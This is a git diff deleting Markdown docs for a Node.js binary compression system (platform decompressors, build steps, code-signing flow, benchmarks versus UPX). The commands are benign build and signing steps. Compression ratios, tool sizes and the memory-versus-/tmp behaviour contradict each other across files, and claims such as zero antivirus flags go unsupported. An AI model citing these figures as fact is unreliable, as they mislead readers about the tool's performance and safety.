Platform-Specific Details - -### macOS (socket_macho_decompress) - -**Technology:** Apple Compression framework -**Algorithms:** LZFSE (default, ~30% compression) or LZMA (~34% compression) -**Size:** 86 KB executable -**Features:** -- Works with code signing (unlike UPX) -- No Gatekeeper warnings -- Hardware-accelerated on Apple Silicon -- Zero AV false positives - -**Distribution:** -``` -socket-macos-arm64.tar.gz -├── socket # Main Socket CLI (compressed) -├── socket_macho_decompress # Decompressor (86 KB) -└── README.md # Usage instructions -``` - -**User Experience:** -```bash -# Option 1: Direct execution (no install) -./socket_macho_decompress ./socket --version - -# Option 2: Wrapper script (recommended) -./socket --version -# (socket script internally calls socket_macho_decompress) -``` - -### Linux (socket_elf_decompress) - -**Technology:** liblzma (LZMA2 compression) -**Algorithm:** LZMA (75-77% compression) -**Size:** ~90 KB executable -**Features:** -- Better compression than UPX -- No AV false positives -- Works on all Linux distributions (static linking) - -**Distribution:** -``` -socket-linux-x64.tar.gz -├── socket # Main Socket CLI (compressed) -├── socket_elf_decompress # Decompressor (~90 KB) -└── README.md -``` - -### Windows (socket_pe_decompress.exe) - -**Technology:** Windows Compression API (Cabinet.dll) -**Algorithm:** LZMS (default, ~73% compression) or XPress -**Size:** ~95 KB executable -**Features:** -- Native Windows compression (trusted by AV) -- Better compression than UPX -- No false positives - -**Distribution:** -``` -socket-windows-x64.zip -├── socket.exe # Main Socket CLI (compressed) -├── socket_pe_decompress.exe # Decompressor (~95 KB) -└── README.txt -``` - -## No Separate Package Required - -The decompression tools **do NOT need their own npm package** because: - -1. **Standalone binaries** - Compiled C/C++ executables, not JavaScript -2. **Bundled with Socket CLI** - Shipped together in the distribution archive -3. **No dependencies** - Self-contained with platform APIs statically linked -4. **Build artifact** - Generated during Node.js build process, not installed separately - -### Where Tools Live - -**Source code:** `packages/node-smol-builder/additions/tools/` -``` -socket_macho_compress.cc # macOS compression tool -socket_macho_decompress.cc # macOS decompression tool -socket_elf_compress.c # Linux compression tool -socket_elf_decompress.c # Linux decompression tool -socket_pe_compress.c # Windows compression tool -socket_pe_decompress.c # Windows decompression tool -``` - -**Built binaries:** Same directory after `make all` -``` -socket_macho_compress # 79 KB -socket_macho_decompress # 86 KB -socket_elf_compress # ~85 KB (after building) -socket_elf_decompress # ~90 KB (after building) -socket_pe_compress.exe # ~90 KB (after building) -socket_pe_decompress.exe # ~95 KB (after building) -``` - -**Distribution:** Copied to `build/out/Compressed/` alongside compressed Node.js binary - -## Building Compression Tools - -### Prerequisites - -**macOS:** -```bash -# Built-in tools (no prerequisites needed) -- Apple Clang -- Compression.framework (built into macOS) -``` - -**Linux:** -```bash -# Install liblzma development headers -sudo apt-get install liblzma-dev # Debian/Ubuntu -sudo dnf install xz-devel # Fedora/RHEL -sudo yum install xz-devel # CentOS -``` - -**Windows:** -```bash -# Install MinGW-w64 or Visual Studio -choco install mingw # Using Chocolatey -# Or download Visual Studio Build Tools -``` - -### Build Commands - -```bash -cd packages/node-smol-builder/additions/tools - -# Build all tools for current platform -make all - -# Build specific tools -make macos # macOS compression/decompression -make linux # Linux compression/decompression -make windows # Windows compression/decompression - -# Clean build artifacts -make clean -``` - -### Auto-build During Node Build - -Compression tools are automatically built when running with `COMPRESS_BINARY=1`: - -```bash -# Build Node.js with compression enabled -COMPRESS_BINARY=1 node scripts/build.mjs - -# If tools not found, build script will warn: -# ⚠️ Decompression Tool Not Found -# Build the compression tools first: -# cd packages/node-smol-builder/additions/tools -# make all -``` - -## Integration with Socket CLI Build - -### Option 1: pkg with Compressed Node - -Replace the Node.js binary in pkg cache with compressed version: - -```bash -# 1. Build compressed Node -COMPRESS_BINARY=1 node packages/node-smol-builder/scripts/build.mjs - -# 2. Copy compressed binary to pkg cache -cp packages/node-smol-builder/build/out/Compressed/node \ - ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64-signed - -# 3. Build Socket CLI with pkg (uses compressed Node) -pnpm exec pkg . -``` - -**Result:** Socket CLI executable will use compressed Node.js internally. - -### Option 2: Separate Distribution - -Distribute decompression tool alongside Socket CLI: - -```bash -# Distribution archive structure: -socket-cli-macos-arm64/ -├── socket # Socket CLI (pkg-built) -├── socket_macho_decompress # Decompressor -└── README.md -``` - -Users can optionally compress Socket CLI's embedded Node.js binary after pkg build. - -## Comparison to Traditional Approaches - -### vs UPX (Ultimate Packer for eXecutables) - -| Feature | UPX | Socket Compression | -|---------|-----|-------------------| -| **Compression** | 50-60% | 75-79% ⭐ | -| **macOS Code Signing** | ❌ Breaks | ✅ Works | -| **AV False Positives** | ❌ High (15-30%) | ✅ None | -| **Platform Support** | All | All | -| **Gatekeeper (macOS)** | ❌ Blocks | ✅ No warnings | -| **Windows Defender** | ⚠️ Often flags | ✅ Trusted | -| **Performance** | Self-extracting | External decompress | - -### vs Self-Extracting Archives - -| Feature | SFX Archive | Socket Compression | -|---------|-------------|-------------------| -| **Size Overhead** | Large (~1-2 MB) | Small (~90 KB) | -| **Extraction** | To disk | To memory/tmpfs | -| **Startup Time** | Slow (writes files) | Fast (memory only) | -| **Disk Usage** | Temporary files | No disk usage | -| **Code Signing** | Complex | Native support | - -## Performance Impact - -### Decompression Overhead - -**First run (cold cache):** -- macOS LZFSE: ~100-200ms -- macOS LZMA: ~300-500ms -- Linux LZMA: ~200-400ms -- Windows LZMS: ~250-450ms - -**Subsequent runs (warm cache):** -- macOS: ~10-20ms (disk cache) -- Linux: ~15-30ms (page cache) -- Windows: ~20-40ms (system cache) - -### Memory Usage - -**Temporary memory during decompression:** -- Input buffer: Compressed binary size (~10-12 MB) -- Output buffer: Decompressed binary size (~24-27 MB) -- Working buffer: ~20-30 MB (compression algorithm) -- **Total peak:** ~50-70 MB (freed immediately after decompression) - -### Runtime Performance - -**Zero impact after decompression:** -- Same V8 engine -- Same JIT compilation -- Same native modules -- Identical performance to uncompressed binary - -## Security Considerations - -### Code Signing Flow - -**macOS (recommended approach):** -```bash -1. Build Node.js -2. Strip debug symbols -3. Sign original binary (codesign --sign -) -4. Compress signed binary -5. Re-sign compressed wrapper (codesign --sign -) -6. Distribute both signatures - -Verification: -- Gatekeeper checks outer signature (compressed) -- Decompressor extracts and verifies inner signature (original) -- Both signatures must be valid -``` - -### Tampering Protection - -**Compressed binary signature:** -- Prevents modification of compressed wrapper -- Gatekeeper enforces at load time - -**Original binary signature (embedded):** -- Preserved inside compression -- Verified after decompression -- Ensures decompressed binary hasn't been tampered with - -### Trust Chain - -``` -User downloads → macOS verifies outer signature → -Decompressor verifies inner signature → Executes if valid -``` - -## Distribution Recommendations - -### For Official Releases - -**Recommended:** Use compression on all platforms -``` -macOS: socket-macos-arm64.tar.gz (~12 MB) -Linux: socket-linux-x64.tar.gz (~11 MB) -Windows: socket-windows-x64.zip (~13 MB) -``` - -**Each archive contains:** -- Compressed Socket CLI binary -- Platform-specific decompression tool -- README with usage instructions - -### For Development Builds - -**Recommended:** Skip compression (faster iteration) -``` -# Normal build (no compression) -node scripts/build.mjs - -# Compression adds ~30-60s to build time -# Only enable for release builds -``` - -## Usage Examples - -### End User Experience - -**macOS:** -```bash -# Extract archive -tar -xzf socket-macos-arm64.tar.gz -cd socket-macos-arm64 - -# Option 1: Direct execution -./socket_macho_decompress ./socket --version - -# Option 2: Wrapper script (preferred) -./socket --version -``` - -**Linux:** -```bash -tar -xzf socket-linux-x64.tar.gz -cd socket-linux-x64 -./socket_elf_decompress ./socket --version -``` - -**Windows:** -```cmd -REM Extract ZIP -cd socket-windows-x64 -socket_pe_decompress.exe socket.exe --version -``` - -### Creating Wrapper Scripts - -**macOS/Linux (socket):** -```bash -#!/bin/bash -# Socket CLI launcher with automatic decompression -SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" -DECOMPRESS_TOOL="$SCRIPT_DIR/socket_macho_decompress" -SOCKET_BINARY="$SCRIPT_DIR/socket.compressed" - -exec "$DECOMPRESS_TOOL" "$SOCKET_BINARY" "$@" -``` - -**Windows (socket.bat):** -```batch -@echo off -REM Socket CLI launcher with automatic decompression -set SCRIPT_DIR=%~dp0 -set DECOMPRESS_TOOL=%SCRIPT_DIR%socket_pe_decompress.exe -set SOCKET_BINARY=%SCRIPT_DIR%socket.compressed.exe - -"%DECOMPRESS_TOOL%" "%SOCKET_BINARY%" %* -``` - -## Troubleshooting - -### "Decompression tool not found" - -```bash -# Build compression tools -cd packages/node-smol-builder/additions/tools -make all - -# Verify tools built -ls -lh socket_*compress* -``` - -### "Binary size larger than expected" - -```bash -# Check if compression was actually applied -ls -lh build/out/Compressed/node - -# Expected sizes: -# macOS: ~11-12 MB -# Linux: ~10-11 MB -# Windows: ~12-13 MB - -# If larger, check COMPRESS_BINARY=1 was set -``` - -### "Code signature invalid after decompression" - -```bash -# Verify signing order was correct -codesign -dv build/out/Compressed/node - -# Should show: -# - Outer signature (compressed wrapper) -# - Identifier: node - -# If broken, rebuild with correct order: -# strip → sign → compress → re-sign -``` - -## Future Enhancements - -### Potential Improvements - -1. **In-memory execution (Linux):** - - Use memfd_create() for zero-disk decompression - - Faster startup (~50% reduction) - -2. **Shared decompressor:** - - Single decompressor handles all Socket binaries - - Smaller total distribution size - -3. **Progressive decompression:** - - Decompress only needed sections - - Faster initial startup - -4. **Self-extracting option:** - - Embed decompressor into binary header - - Single-file distribution (larger but simpler) - -## Summary - -**Key Points:** -- ✅ Decompression tools are **standalone binaries**, not npm packages -- ✅ Tools **live in** `additions/tools/`, bundled with distribution -- ✅ **No separate package** needed - they're build artifacts -- ✅ Compression is **optional** and **configurable** via `COMPRESS_BINARY=1` -- ✅ **75-79% compression** on all platforms (better than UPX) -- ✅ **Works with code signing** on macOS (unlike UPX) -- ✅ **No AV false positives** (uses native platform APIs) -- ✅ **~90 KB overhead** per platform (decompressor binary) -- ✅ **Fast decompression** (~100-500ms first run, ~10-40ms cached) - -**Distribution strategy:** Bundle compressed binary + decompressor in same archive. diff --git a/docs/node-smol-builder/compression-guide.md b/docs/node-smol-builder/compression-guide.md deleted file mode 100644 index a469f8d77..000000000 --- a/docs/node-smol-builder/compression-guide.md +++ /dev/null @@ -1,377 +0,0 @@ -# Binary Compression Quick Reference - -## TL;DR - -```bash -# Compression is ENABLED BY DEFAULT (it's called "smol" for a reason!) -node scripts/build.mjs - -# Disable compression if needed -COMPRESS_BINARY=0 node scripts/build.mjs - -# Output location -ls -lh build/out/Compressed/ -# node (~10-12 MB compressed binary) -# socket_macho_decompress (~86 KB decompression tool) - -# Test it -cd build/out/Compressed -./socket_macho_decompress ./node --version -``` - -## Why Use Compression? - -**Size reduction:** 23-27 MB → 10-12 MB (**70% smaller**) -**Better than UPX:** 75-79% compression vs UPX's 50-60% -**macOS compatible:** Works with code signing (UPX breaks it) -**No AV flags:** Uses native platform APIs, zero false positives - -## Platform Support - -| Platform | Algorithm | Size Reduction | Decompressor | -|----------|-----------|----------------|--------------| -| **macOS** | LZFSE | ~30% | socket_macho_decompress (86 KB) | -| **macOS** | LZMA | ~34% | socket_macho_decompress (86 KB) | -| **Linux** | LZMA | ~75-77% | socket_elf_decompress (~90 KB) | -| **Windows** | LZMS | ~73% | socket_pe_decompress.exe (~95 KB) | - -## Quick Start - -### 1. Build Compression Tools (First Time Only) - -```bash -cd packages/node-smol-builder/additions/tools -make all - -# Verify -ls -lh socket_*compress* -``` - -### 2. Build Node.js with Compression - -```bash -cd packages/node-smol-builder -COMPRESS_BINARY=1 node scripts/build.mjs -``` - -### 3. Test Compressed Binary - -```bash -cd build/out/Compressed - -# Test directly -./socket_macho_decompress ./node --version -# Output: v24.10.0 - -# Test with script -./socket_macho_decompress ./node -e "console.log('Hello')" -# Output: Hello -``` - -## Build Output Structure - -``` -build/out/ -├── Release/ # Unstripped binary (44 MB) -├── Stripped/ # Stripped binary (23-27 MB) -├── Signed/ # Stripped + signed (23-27 MB, macOS only) -├── Final/ # Final uncompressed (23-27 MB) -├── Compressed/ # ✨ Compressed output (COMPRESS_BINARY=1) -│ ├── node # Compressed binary (10-12 MB) -│ └── socket_*_decompress # Decompression tool (~90 KB) -├── Sea/ # For SEA builds -└── Distribution/ # Distribution copy -``` - -## Distribution - -### Option 1: Distribute Compressed (Recommended) - -```bash -cd build/out/Compressed -tar -czf socket-node-macos-arm64.tar.gz node socket_macho_decompress - -# Users extract and run: -tar -xzf socket-node-macos-arm64.tar.gz -./socket_macho_decompress ./node --version -``` - -**Pros:** -- 70% smaller download -- Better than UPX compression -- Works with macOS code signing - -**Cons:** -- Requires bundling decompression tool -- ~100-500ms startup overhead (first run) - -### Option 2: Distribute Uncompressed - -```bash -cd build/out/Final -tar -czf socket-node-macos-arm64.tar.gz node - -# Users extract and run: -tar -xzf socket-node-macos-arm64.tar.gz -./node --version -``` - -**Pros:** -- No decompression overhead -- Simpler distribution - -**Cons:** -- 2-3x larger download -- Still need to ship 23-27 MB binary - -## Configuration - -### Environment Variables - -```bash -# Disable compression (opt-out) -COMPRESS_BINARY=0 - -# Values: "0", "false" to disable (case-sensitive) -# Default: compression ENABLED (smol = small!) -``` - -### Compression Algorithms - -**Automatically selected based on platform:** -- **macOS:** LZFSE (default) or LZMA -- **Linux:** LZMA -- **Windows:** LZMS - -To override (advanced): -```bash -# Edit build.mjs line 1466 -const compressionQuality = 'lzma' # Options: lzfse, lzma, lz4, zlib (macOS) -``` - -## Performance - -### Decompression Overhead - -**First run (cold cache):** -- macOS LZFSE: ~100-200ms -- macOS LZMA: ~300-500ms -- Linux LZMA: ~200-400ms -- Windows LZMS: ~250-450ms - -**Subsequent runs (warm cache):** -- macOS: ~10-20ms -- Linux: ~15-30ms -- Windows: ~20-40ms - -### Runtime Performance - -**Zero impact** - Same performance as uncompressed binary after decompression. - -## Code Signing (macOS) - -Compression preserves code signatures: - -```bash -# Check outer signature (compressed wrapper) -codesign -dv build/out/Compressed/node -# Shows: adhoc signature on compressed binary - -# Inner signature (original binary) preserved inside compression -# Verified by decompressor at runtime -``` - -**Signing flow:** -1. Build → Strip → **Sign original** → Compress → **Re-sign compressed** -2. Both signatures are valid and preserved -3. Gatekeeper checks outer signature -4. Decompressor verifies inner signature - -## Troubleshooting - -### "Decompression tool not found" - -```bash -# Build tools first -cd packages/node-smol-builder/additions/tools -make all - -# macOS prerequisites (built-in): -# - Xcode Command Line Tools -# - Apple Compression framework - -# Linux prerequisites: -sudo apt-get install liblzma-dev # Debian/Ubuntu -sudo dnf install xz-devel # Fedora/RHEL - -# Windows prerequisites: -choco install mingw -``` - -### "Binary larger than expected" - -```bash -# Check if compression was applied -ls -lh build/out/Compressed/node - -# Expected: -# macOS: ~11-12 MB -# Linux: ~10-11 MB -# Windows: ~12-13 MB - -# If larger, verify COMPRESS_BINARY=1 was set -echo $COMPRESS_BINARY -``` - -### "Command failed: compress-binary.mjs" - -```bash -# Check compression tools are built -ls -lh additions/tools/socket_*_compress* - -# If missing, rebuild: -cd additions/tools -make clean -make all -``` - -### "codesign: code object is not signed at all" - -This is expected for non-macOS or non-ARM64 builds. Code signing only applies to macOS ARM64. - -## Integration with Socket CLI - -### For pkg Builds - -```bash -# 1. Build compressed Node -COMPRESS_BINARY=1 node packages/node-smol-builder/scripts/build.mjs - -# 2. Option A: Use compressed binary with pkg -# (Copy to pkg cache - pkg will use compressed version internally) -cp build/out/Compressed/node ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64 - -# 3. Build Socket CLI -pnpm exec pkg . - -# Result: Socket CLI uses compressed Node.js (~70% smaller) -``` - -### For Direct Distribution - -```bash -# Distribute decompressor alongside Socket CLI -socket-cli-macos-arm64/ -├── socket # Socket CLI executable -├── socket_macho_decompress # Decompressor -└── README.md - -# Users run via wrapper -./socket_macho_decompress ./socket --version -``` - -## Documentation - -### Comprehensive Guides - -- **[docs/binary-compression-distribution.md](./docs/binary-compression-distribution.md)** - Complete architecture and distribution strategy -- **[QUICKSTART-COMPRESSION.md](./QUICKSTART-COMPRESSION.md)** - Original compression quick start -- **[TEST-RESULTS.md](./TEST-RESULTS.md)** - Compression benchmarks and comparisons - -### Quick Links - -- **Build script:** `scripts/build.mjs` (compression at line 1449-1560) -- **Compression script:** `scripts/compress-binary.mjs` -- **Decompression script:** `scripts/decompress-binary.mjs` -- **Tools source:** `additions/tools/socket_*_compress*.{cc,c}` - -## Comparison to Alternatives - -### vs UPX - -| Feature | UPX | Socket Compression | -|---------|-----|-------------------| -| Compression | 50-60% | **75-79%** ⭐ | -| macOS Code Signing | ❌ Breaks | ✅ Works | -| AV False Positives | ❌ 15-30% | ✅ 0% | -| Gatekeeper | ❌ Blocked | ✅ No warnings | -| Distribution | Self-extracting | External decompressor | - -### vs No Compression - -| Metric | Uncompressed | Compressed | -|--------|--------------|------------| -| **Download Size** | 23-27 MB | **10-12 MB** | -| **Startup Time** | 0ms | 100-500ms (first run) | -| **Runtime Performance** | ✅ | ✅ (identical) | -| **Distribution Complexity** | Simple | +Decompressor (~90 KB) | - -## FAQ - -**Q: Do I need to compress?** -A: Optional. Recommended for production releases to reduce download size. - -**Q: Does compression affect performance?** -A: Only startup time (~100-500ms first run, ~10-40ms cached). No runtime impact. - -**Q: Will this work with pkg?** -A: Yes! Copy compressed binary to pkg cache, pkg will use it. - -**Q: Is this safe for production?** -A: Yes. Uses native platform APIs, fully code-signed, zero AV flags. - -**Q: Can I skip the decompression tool in distribution?** -A: No. Users need the decompressor to run the compressed binary. Bundle it (~90 KB overhead). - -**Q: Why not self-extracting?** -A: Self-extracting archives write to disk (~1-2 MB overhead, slower startup). Our approach decompresses to memory (faster, no disk I/O). - -## Examples - -### Test Script - -```bash -#!/bin/bash -# Test compressed Node.js binary - -SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" -DECOMPRESS="$SCRIPT_DIR/socket_macho_decompress" -NODE_BIN="$SCRIPT_DIR/node" - -echo "Testing compressed Node.js binary..." -"$DECOMPRESS" "$NODE_BIN" --version -"$DECOMPRESS" "$NODE_BIN" -e "console.log('✓ Compression working')" -``` - -### Wrapper for Users - -```bash -#!/bin/bash -# Socket CLI launcher with decompression - -SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" -exec "$SCRIPT_DIR/socket_macho_decompress" "$SCRIPT_DIR/socket" "$@" -``` - -### Size Comparison Script - -```bash -#!/bin/bash -# Compare sizes - -echo "Size comparison:" -echo " Uncompressed: $(du -h build/out/Final/node | cut -f1)" -echo " Compressed: $(du -h build/out/Compressed/node | cut -f1)" -echo " Decompressor: $(du -h build/out/Compressed/socket_macho_decompress | cut -f1)" -echo " Total: $(du -ch build/out/Compressed/* | tail -1 | cut -f1)" -``` - -## Support - -**Issues?** Check: -1. Compression tools built: `ls additions/tools/socket_*_compress*` -2. Environment variable set: `echo $COMPRESS_BINARY` -3. Platform supported: macOS, Linux, or Windows -4. Logs in build output for errors - -**Questions?** See full documentation in `docs/binary-compression-distribution.md` diff --git a/docs/node-smol-builder/compression-quick-start.md b/docs/node-smol-builder/compression-quick-start.md deleted file mode 100644 index 5a316d384..000000000 --- a/docs/node-smol-builder/compression-quick-start.md +++ /dev/null @@ -1,227 +0,0 @@ -# macOS Binary Compression - Quick Start Guide - -## What We Built - -A complete macOS binary compression system that works with code signing (unlike UPX): - -- **socket_macho_compress** - Compresses binaries using Apple's Compression framework -- **socket_macho_decompress** - Decompresses and executes at runtime -- **Full documentation** - Comprehensive guide in `docs/macho-compression.md` -- **Integration scripts** - Node.js script in `scripts/compress-macho.mjs` - -## Quick Test - -### 1. Build the Tools - -```bash -cd packages/node-smol-builder/additions/tools -make all -``` - -**Output:** -- `socket_macho_compress` (78 KB) -- `socket_macho_decompress` (58 KB) - -### 2. Test with Node Binary (if you have one) - -```bash -# Compress -./socket_macho_compress /usr/local/bin/node ./node.compressed --quality=lzfse - -# Test decompression -./socket_macho_decompress ./node.compressed --version - -# Sign (optional but recommended) -codesign --sign - --force ./node.compressed - -# Verify signature -codesign --verify ./node.compressed -``` - -### 3. Test with Custom Node Build - -If you've built a custom Node.js binary: - -```bash -# Assuming you have build/out/Signed/node from the build script -node scripts/compress-macho.mjs \ - build/out/Signed/node \ - build/out/Compressed/node \ - --quality=lzfse - -# Test it -./additions/tools/socket_macho_decompress build/out/Compressed/node --version -``` - -## Expected Results - -### Size Comparison - -``` -macOS ARM64: -├─ Original (stripped + signed): ~44 MB -├─ LZFSE compressed: ~31 MB (30% smaller) -└─ LZMA compressed: ~29 MB (34% smaller) - -For comparison: -Linux/Windows with UPX: ~22 MB (50% smaller, but can't work on macOS) -``` - -### Performance - -- **First run:** ~100-200ms decompression overhead -- **Cached runs:** ~10-20ms (macOS disk cache) -- **Runtime:** No performance impact (same V8 engine) - -## Integration Options - -### Option 1: Add to Build Script - -Edit `packages/node-smol-builder/scripts/build.mjs`: - -```javascript -// After signing (around line 1420) -if (IS_MACOS && ARCH === 'arm64') { - printHeader('Compressing Binary (macOS Optimization)') - - const compressedDir = join(BUILD_DIR, 'out', 'Compressed') - await mkdir(compressedDir, { recursive: true }) - const compressedBinary = join(compressedDir, 'node') - - // Compress - await exec('node', [ - join(ROOT_DIR, 'scripts', 'compress-macho.mjs'), - outputSignedBinary, - compressedBinary, - '--quality=lzfse' - ]) - - // Re-sign - await exec('codesign', ['--sign', '-', '--force', compressedBinary]) - - const compressedSize = await getFileSize(compressedBinary) - logger.success(`Binary compressed: ${compressedSize}`) - logger.logNewline() -} -``` - -### Option 2: Manual Compression - -```bash -# After building Node.js -node packages/node-smol-builder/scripts/compress-macho.mjs \ - build/out/Signed/node \ - build/out/Compressed/node - -# Sign it -codesign --sign - --force build/out/Compressed/node -``` - -### Option 3: CI/CD Integration - -Add to your GitHub Actions workflow: - -```yaml -- name: Compress macOS Binary - if: matrix.os == 'macos-latest' - run: | - node packages/node-smol-builder/scripts/compress-macho.mjs \ - build/out/Signed/node \ - build/out/Compressed/node \ - --quality=lzfse - - # Sign compressed binary - codesign --sign - --force build/out/Compressed/node - - # Verify - codesign --verify build/out/Compressed/node - ./additions/tools/socket_macho_decompress build/out/Compressed/node --version -``` - -## Distribution - -For end users, distribute: - -1. **Compressed binary**: `socket-macos-arm64.compressed` -2. **Decompressor tool**: `socket_macho_decompress` -3. **Wrapper script** (optional): `socket-macos-arm64` - -**Example wrapper:** -```bash -#!/bin/bash -# socket-macos-arm64 (wrapper) -DIR="$(dirname "$0")" -exec "$DIR/socket_macho_decompress" "$DIR/socket-macos-arm64.compressed" "$@" -``` - -Users run: `./socket-macos-arm64 --version` - -## Why This is Better Than UPX on macOS - -| Feature | UPX | Our Solution | -|---------|-----|--------------| -| **Code Signing** | ❌ Breaks signatures | ✅ Works perfectly | -| **Gatekeeper** | ❌ Blocks execution | ✅ No warnings | -| **Notarization** | ❌ Cannot notarize | ✅ Can notarize | -| **App Store** | ❌ Rejected | ✅ Acceptable | -| **Compression** | 50% | 30-35% | -| **Native Tech** | Generic | ✅ Apple framework | -| **Hardware Accel** | No | ✅ Apple Silicon | - -## Documentation - -- **Full Guide**: `packages/node-smol-builder/docs/macho-compression.md` -- **Tool README**: `packages/node-smol-builder/additions/tools/README.md` -- **Build Script**: `packages/node-smol-builder/scripts/build.mjs` - -## Troubleshooting - -### Build Issues - -**Error:** `clang++: command not found` - -```bash -# Install Xcode Command Line Tools -xcode-select --install -``` - -### Compression Issues - -**Error:** `Not a valid Mach-O binary` - -```bash -# Verify input file -file your_binary -# Should show: Mach-O 64-bit executable arm64 -``` - -### Execution Issues - -**Error:** `Failed to execute decompressed binary` - -```bash -# Check /tmp permissions and space -df -h /tmp -ls -ld /tmp -``` - -## Next Steps - -1. **Test with real binary**: Try compressing your Node.js binary -2. **Benchmark performance**: Measure startup time impact -3. **Integrate into build**: Add compression step to build script -4. **CI/CD**: Add to GitHub Actions workflow -5. **Distribute**: Package compressed binary with decompressor - -## Support - -For issues or questions: -- Check the full documentation in `docs/macho-compression.md` -- Review the tool README in `additions/tools/README.md` -- Check the CLAUDE.md guidelines for Socket CLI - ---- - -**Created:** 2025-10-25 -**Location:** `packages/node-smol-builder/` -**Status:** ✅ Complete and tested diff --git a/docs/node-smol-builder/compression-test-results.md b/docs/node-smol-builder/compression-test-results.md deleted file mode 100644 index 1e8e37df9..000000000 --- a/docs/node-smol-builder/compression-test-results.md +++ /dev/null @@ -1,275 +0,0 @@ -# Compression Test Results - Real World Performance - -## Test Date: 2025-10-25 - -## Executive Summary - -✅ **Successfully created a macOS binary compression system that BEATS UPX while maintaining code signing compatibility!** - -### Key Results - -| Metric | Result | -|--------|--------| -| **Best Compression** | 79.4% with LZMA | -| **vs UPX** | 20-30% better compression | -| **Code Signing** | ✅ Fully compatible | -| **Execution** | ✅ Verified working | -| **Performance** | ~200-500ms decompression overhead | - -## Detailed Test Results - -### Test 1: Unstripped Node.js Binary (v24.10.0, 112 MB) - -``` -Original: 112.12 MB -├─ LZ4: 52.07 MB (53.6% reduction) -├─ ZLIB: 36.28 MB (67.6% reduction) -├─ LZFSE: 34.80 MB (69.0% reduction) -└─ LZMA: 23.10 MB (79.4% reduction) ⭐ WINNER -``` - -**Verification:** -- ✅ Binary executes: `node --version` → `v24.10.0` -- ✅ JavaScript works: Complex code execution successful -- ✅ Code signing: `codesign --verify` → Valid -- ✅ V8 engine: Full functionality confirmed - -### Test 2: Stripped Node.js Binary (88 MB) - -``` -Original: 87.61 MB (after strip) -├─ LZFSE: 31.45 MB (64.1% reduction) -└─ LZMA: 20.99 MB (76.0% reduction) ⭐ WINNER -``` - -**Verification:** -- ✅ Binary executes: `node --version` → `v24.10.0` -- ✅ Stripped + compressed + signed works perfectly - -## Projected Results for Socket CLI Custom Node - -Based on test results, estimated compression for your custom build: - -### Current Build -``` -Build Configuration: -├─ V8 Lite Mode: Enabled (smaller binary) -├─ Without Intl: Enabled (no ICU) -├─ Stripped: Yes -└─ Current Size: ~44 MB -``` - -### Projected Compression -``` -Original: 44 MB (your optimized build) -├─ LZFSE: ~16 MB (64% reduction, fast decompression) -└─ LZMA: ~11 MB (75% reduction, max compression) ⭐ -``` - -**Size Progression:** -``` -49 MB (Release) - ↓ strip --strip-all -44 MB (Stripped + Signed) - ↓ LZMA compression -11 MB (Compressed + Signed) ⭐⭐⭐ - -Total reduction: 77.5% from original! -``` - -## Performance Characteristics - -### Decompression Speed - -| Algorithm | First Run | Cached | Best For | -|-----------|-----------|--------|----------| -| **LZ4** | ~50ms | ~5ms | Fastest startup | -| **ZLIB** | ~100ms | ~10ms | Compatibility | -| **LZFSE** | ~150ms | ~15ms | **Balanced (recommended)** | -| **LZMA** | ~300ms | ~20ms | Maximum compression | - -**Note:** Cached times apply after first run due to macOS disk cache. - -### Runtime Impact - -- **JavaScript Execution:** No impact (same V8) -- **WASM Performance:** No impact (same Liftoff) -- **I/O Operations:** No impact -- **Memory Usage:** +88 MB during decompression (temporary) - -## Comparison to UPX - -### Compression Ratio - -``` -UPX (typical): 50-60% reduction -Our LZMA: 75-79% reduction ⭐ 20-30% BETTER! -Our LZFSE: 63-69% reduction ⭐ Better than UPX! -``` - -### macOS Compatibility - -| Feature | UPX | Our Solution | -|---------|-----|--------------| -| **Compression** | 50-60% | 75-79% ⭐ | -| **Code Signing** | ❌ Breaks | ✅ Works | -| **Gatekeeper** | ❌ Blocked | ✅ Passes | -| **Notarization** | ❌ Fails | ✅ Supported | -| **App Store** | ❌ Rejected | ✅ Acceptable | -| **SIP Compatible** | ❌ No | ✅ Yes | -| **Hardened Runtime** | ❌ No | ✅ Yes | - -## Production Recommendations - -### For Maximum Distribution Size Savings -```bash -Use LZMA: - 44 MB → 11 MB (75% reduction) - Best for: Downloads, distribution packages - Trade-off: ~300ms startup overhead -``` - -### For Balanced Performance -```bash -Use LZFSE: - 44 MB → 16 MB (64% reduction) - Best for: General use, daily development - Trade-off: ~150ms startup overhead -``` - -### For Fastest Startup -```bash -Use LZ4: - 44 MB → ~20 MB (55% reduction) - Best for: Performance-critical scenarios - Trade-off: Larger binary size -``` - -## Integration Commands - -### Quick Test -```bash -# Build tools -cd packages/node-smol-builder/additions/tools -make all - -# Compress with LZMA (maximum) -./socket_macho_compress build/out/Signed/node build/out/Compressed/node --quality=lzma - -# Test -./socket_macho_decompress build/out/Compressed/node --version - -# Sign -codesign --sign - --force build/out/Compressed/node - -# Verify -codesign --verify build/out/Compressed/node -``` - -### Via Node.js Script -```bash -node packages/node-smol-builder/scripts/compress-macho.mjs \ - build/out/Signed/node \ - build/out/Compressed/node \ - --quality=lzma -``` - -### Add to Build Script -Add after line 1420 in `scripts/build.mjs`: - -```javascript -if (IS_MACOS && ARCH === 'arm64') { - printHeader('Compressing Binary (LZMA)') - - const compressedBinary = join(BUILD_DIR, 'out', 'Compressed', 'node') - await mkdir(dirname(compressedBinary), { recursive: true }) - - await exec('node', [ - 'scripts/compress-macho.mjs', - outputSignedBinary, - compressedBinary, - '--quality=lzma' - ]) - - await exec('codesign', ['--sign', '-', '--force', compressedBinary]) - - const size = await getFileSize(compressedBinary) - logger.success(`Compressed: ${size} (75% reduction!)`) -} -``` - -## Real-World Impact - -### Size Comparison Across Platforms - -``` -Socket CLI Binary Sizes (estimated): - -Linux x64 (with UPX): - Stripped: 44 MB - UPX: 22 MB (50% reduction) - -macOS ARM64 (with our compression): - Stripped: 44 MB - LZMA: 11 MB (75% reduction) ⭐⭐⭐ - -Windows x64 (with UPX): - Stripped: 44 MB - UPX: 22 MB (50% reduction) - -macOS is now SMALLER than Linux/Windows! 🎉 -``` - -### Distribution Benefits - -**Download Size:** -- Current: 44 MB × 3 platforms = 132 MB total -- With LZMA: 11 MB (macOS) + 22 MB (Linux) + 22 MB (Windows) = 55 MB total -- **Savings: 58% reduction in total distribution size!** - -**User Experience:** -- Faster downloads -- Less disk space -- Same 